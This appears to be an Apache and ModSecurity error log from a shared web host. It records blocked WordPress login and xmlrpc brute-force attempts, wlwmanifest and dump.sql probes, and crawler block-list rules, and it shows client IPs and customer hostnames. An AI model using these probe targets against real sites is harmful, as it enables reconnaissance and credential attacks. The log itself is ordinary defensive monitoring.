[Tue May 26 18:32:40.115999 2026] [security2:error] [pid 998632:tid 998856] [client 88.189.55.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ761OTU2dW0MS1EnMSAAAAD4"]
[Tue May 26 18:32:41.316743 2026] [security2:error] [pid 1007701:tid 1007943] [client 124.43.5.103:14199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZ8Q05qHzKMxj0enGeDAAAAPU"]
[Tue May 26 18:32:41.316900 2026] [security2:error] [pid 1007701:tid 1007943] [client 124.43.5.103:14199] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZ8Q05qHzKMxj0enGeDAAAAPU"]
[Tue May 26 18:32:42.190703 2026] [security2:error] [pid 1007701:tid 1007850] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ8Q05qHzKMxj0enGeEgAAAJg"]
[Tue May 26 18:32:44.537269 2026] [security2:error] [pid 998632:tid 998700] [remote 209.42.20.53:48438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWZ9K1OTU2dW0MS1EnMbgAABSw"]
[Tue May 26 18:32:44.649296 2026] [security2:error] [pid 998632:tid 998798] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ9K1OTU2dW0MS1EnMbQAAAAc"]
[Tue May 26 18:32:48.028639 2026] [security2:error] [pid 1007701:tid 1007951] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ9w05qHzKMxj0enGeOgAAAP0"]
[Tue May 26 18:32:49.914643 2026] [security2:error] [pid 998632:tid 998832] [client 74.7.244.46:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.test.anujtradingco.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWZ-a1OTU2dW0MS1EnMmwAAACc"]
[Tue May 26 18:32:49.915210 2026] [security2:error] [pid 1007701:tid 1007847] [client 74.7.244.46:37742] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.test.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWZ-Q05qHzKMxj0enGeSAAAlX8"]
[Tue May 26 18:32:50.302749 2026] [autoindex:error] [pid 1007701:tid 1007945] [client 74.7.241.52:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:32:50.643343 2026] [security2:error] [pid 1007701:tid 1007907] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ-g05qHzKMxj0enGeUAAAANE"]
[Tue May 26 18:32:51.798167 2026] [security2:error] [pid 1007701:tid 1007923] [client 124.43.5.103:14516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZ-w05qHzKMxj0enGeaQAAAOE"]
[Tue May 26 18:32:51.798451 2026] [security2:error] [pid 1007701:tid 1007923] [client 124.43.5.103:14516] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWZ-w05qHzKMxj0enGeaQAAAOE"]
[Tue May 26 18:32:53.351206 2026] [security2:error] [pid 1007701:tid 1007882] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ_A05qHzKMxj0enGedQAAALg"]
[Tue May 26 18:32:53.867573 2026] [security2:error] [pid 1007701:tid 1007841] [client 143.198.114.199:60308] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "sandbox.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWZ_Q05qHzKMxj0enGefQAAAI8"]
[Tue May 26 18:32:55.849620 2026] [security2:error] [pid 1007701:tid 1007954] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWZ_w05qHzKMxj0enGeiwAAAQA"]
[Tue May 26 18:32:56.697284 2026] [security2:error] [pid 998632:tid 998696] [remote 178.104.164.71:36316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWaAK1OTU2dW0MS1EnMzwAAZSg"]
[Tue May 26 18:32:59.129662 2026] [security2:error] [pid 1007701:tid 1007909] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaAg05qHzKMxj0enGerQAAANM"]
[Tue May 26 18:32:59.394317 2026] [security2:error] [pid 1007701:tid 1007951] [client 146.174.160.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaAg05qHzKMxj0enGesAAAAP0"]
[Tue May 26 18:33:01.227548 2026] [security2:error] [pid 998632:tid 998906] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaBK1OTU2dW0MS1EnM8AAAAG0"]
[Tue May 26 18:33:02.611503 2026] [security2:error] [pid 1007701:tid 1007950] [client 124.43.5.103:52220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaBg05qHzKMxj0enGe1QAAAPw"]
[Tue May 26 18:33:02.611654 2026] [security2:error] [pid 1007701:tid 1007950] [client 124.43.5.103:52220] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaBg05qHzKMxj0enGe1QAAAPw"]
[Tue May 26 18:33:02.624649 2026] [security2:error] [pid 1007701:tid 1007908] [client 85.208.96.194:27262] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWaBg05qHzKMxj0enGe1gAAANI"]
[Tue May 26 18:33:02.624776 2026] [security2:error] [pid 1007701:tid 1007908] [client 85.208.96.194:27262] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWaBg05qHzKMxj0enGe1gAAANI"]
[Tue May 26 18:33:03.275208 2026] [security2:error] [pid 998632:tid 998703] [remote 185.15.230.106:57652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.230.15.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWaB61OTU2dW0MS1EnNCQAAfi8"]
[Tue May 26 18:33:04.408188 2026] [security2:error] [pid 1007701:tid 1007871] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaBw05qHzKMxj0enGe5gAAAK0"]
[Tue May 26 18:33:07.221901 2026] [security2:error] [pid 998632:tid 998847] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaCq1OTU2dW0MS1EnNLQAAADU"]
[Tue May 26 18:33:09.659653 2026] [security2:error] [pid 1007701:tid 1007906] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaDA05qHzKMxj0enGfGwAAANA"]
[Tue May 26 18:33:09.764997 2026] [core:crit] [pid 1007701:tid 1007944] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:33:09.895715 2026] [core:crit] [pid 1007701:tid 1007834] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:33:10.286030 2026] [core:crit] [pid 1007701:tid 1007867] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:33:10.893944 2026] [core:crit] [pid 1007701:tid 1007844] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:33:11.999659 2026] [security2:error] [pid 1007701:tid 1007899] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaDw05qHzKMxj0enGfQwAAAMk"]
[Tue May 26 18:33:13.123984 2026] [core:crit] [pid 998632:tid 998874] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:33:13.506737 2026] [core:crit] [pid 1007701:tid 1007831] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:33:13.599423 2026] [security2:error] [pid 1007701:tid 1007941] [client 124.43.5.103:15145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaEQ05qHzKMxj0enGfVwAAAPM"]
[Tue May 26 18:33:13.599604 2026] [security2:error] [pid 1007701:tid 1007941] [client 124.43.5.103:15145] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaEQ05qHzKMxj0enGfVwAAAPM"]
[Tue May 26 18:33:14.042616 2026] [security2:error] [pid 1007701:tid 1007882] [client 66.249.70.169:39045] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWaEQ05qHzKMxj0enGfYQAAALg"]
[Tue May 26 18:33:14.769962 2026] [security2:error] [pid 1007701:tid 1007928] [client 66.249.64.73:40404] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWaEg05qHzKMxj0enGffgAAAOY"]
[Tue May 26 18:33:14.848709 2026] [security2:error] [pid 1007701:tid 1007933] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaEg05qHzKMxj0enGfaAAAAOs"]
[Tue May 26 18:33:16.689197 2026] [core:crit] [pid 998632:tid 998860] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:33:16.709602 2026] [security2:error] [pid 1007701:tid 1007756] [remote 103.145.62.145:4294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWaFA05qHzKMxj0enGfugAA1jY"]
[Tue May 26 18:33:17.256489 2026] [security2:error] [pid 1007701:tid 1007792] [remote 103.145.62.145:4294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWaFQ05qHzKMxj0enGfxAAA31o"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 18:33:18.890338 2026] [security2:error] [pid 998632:tid 998800] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaFa1OTU2dW0MS1EnNbwAAAAk"]
[Tue May 26 18:33:21.223167 2026] [security2:error] [pid 1007701:tid 1007919] [client 185.246.190.83:48120] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "canopykaapi.com"] [uri "/dump.sql"] [unique_id "ahWaGQ05qHzKMxj0enGf_QAAAN0"], referer: canopykaapi.com/dump.sql
[Tue May 26 18:33:21.872033 2026] [security2:error] [pid 1007701:tid 1007947] [client 74.7.228.9:58190] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.test.azurmediatec.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWaGQ05qHzKMxj0enGgCwAA-Rg"]
[Tue May 26 18:33:22.027933 2026] [security2:error] [pid 1007701:tid 1007871] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaGA05qHzKMxj0enGf-QAAAK0"]
[Tue May 26 18:33:22.257583 2026] [autoindex:error] [pid 1007701:tid 1007819] [remote 74.7.243.218:37988] AH01276: Cannot serve directory /home2/azurm42s/test.azurmediatec.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:33:24.129079 2026] [security2:error] [pid 1007701:tid 1007923] [client 124.43.5.103:52782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaHA05qHzKMxj0enGgKwAAAOE"]
[Tue May 26 18:33:24.129201 2026] [security2:error] [pid 1007701:tid 1007923] [client 124.43.5.103:52782] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaHA05qHzKMxj0enGgKwAAAOE"]
[Tue May 26 18:33:24.936040 2026] [security2:error] [pid 998632:tid 998840] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaG61OTU2dW0MS1EnNmAAAAC4"]
[Tue May 26 18:33:25.898310 2026] [security2:error] [pid 998632:tid 998901] [client 24.182.175.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaHK1OTU2dW0MS1EnNoAAAAGg"]
[Tue May 26 18:33:27.143327 2026] [security2:error] [pid 998632:tid 998868] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaHa1OTU2dW0MS1EnNqQAAAEo"]
[Tue May 26 18:33:28.639184 2026] [security2:error] [pid 1007701:tid 1007881] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaIA05qHzKMxj0enGgUgAAALc"]
[Tue May 26 18:33:32.119386 2026] [security2:error] [pid 1007701:tid 1007863] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaIw05qHzKMxj0enGgeAAAAKU"]
[Tue May 26 18:33:33.220505 2026] [security2:error] [pid 998632:tid 998875] [client 192.178.8.101:39741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWaJa1OTU2dW0MS1EnNzwAAAFA"]
[Tue May 26 18:33:35.334515 2026] [security2:error] [pid 1007701:tid 1007855] [client 124.43.5.103:15733] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaJg05qHzKMxj0enGgngAAAJ0"]
[Tue May 26 18:33:35.334660 2026] [security2:error] [pid 1007701:tid 1007855] [client 124.43.5.103:15733] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaJg05qHzKMxj0enGgngAAAJ0"]
[Tue May 26 18:33:35.587161 2026] [security2:error] [pid 998632:tid 998911] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaJ61OTU2dW0MS1EnN4wAAAHI"]
[Tue May 26 18:33:37.273731 2026] [security2:error] [pid 1007701:tid 1007875] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaKA05qHzKMxj0enGgswAAALE"]
[Tue May 26 18:33:37.882144 2026] [security2:error] [pid 998632:tid 998921] [client 45.151.139.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWaKa1OTU2dW0MS1EnN_gAAAHw"], referer: https://www.anujtradingco.com/
[Tue May 26 18:33:39.493868 2026] [security2:error] [pid 1007701:tid 1007905] [client 45.151.139.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWaKw05qHzKMxj0enGg0gAAAM8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 18:33:39.735203 2026] [security2:error] [pid 1007701:tid 1007952] [client 114.119.145.140:31683] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "triviewsolutions.com"] [uri "/branding-solutions"] [unique_id "ahWaKw05qHzKMxj0enGg1QAAAP4"], referer: https://triviewsolutions.com/branding-solutions
[Tue May 26 18:33:40.206413 2026] [security2:error] [pid 1007701:tid 1007849] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaKw05qHzKMxj0enGg1AAAAJc"]
[Tue May 26 18:33:43.532606 2026] [security2:error] [pid 998632:tid 998897] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaLq1OTU2dW0MS1EnOGgAAAGQ"]
[Tue May 26 18:33:44.043349 2026] [security2:error] [pid 1007701:tid 1007945] [client 45.154.98.214:63787] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWaMA05qHzKMxj0enGhFAAAAPc"]
[Tue May 26 18:33:44.799398 2026] [security2:error] [pid 998632:tid 998813] [client 45.154.98.214:51201] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWaMK1OTU2dW0MS1EnOJQAAABY"]
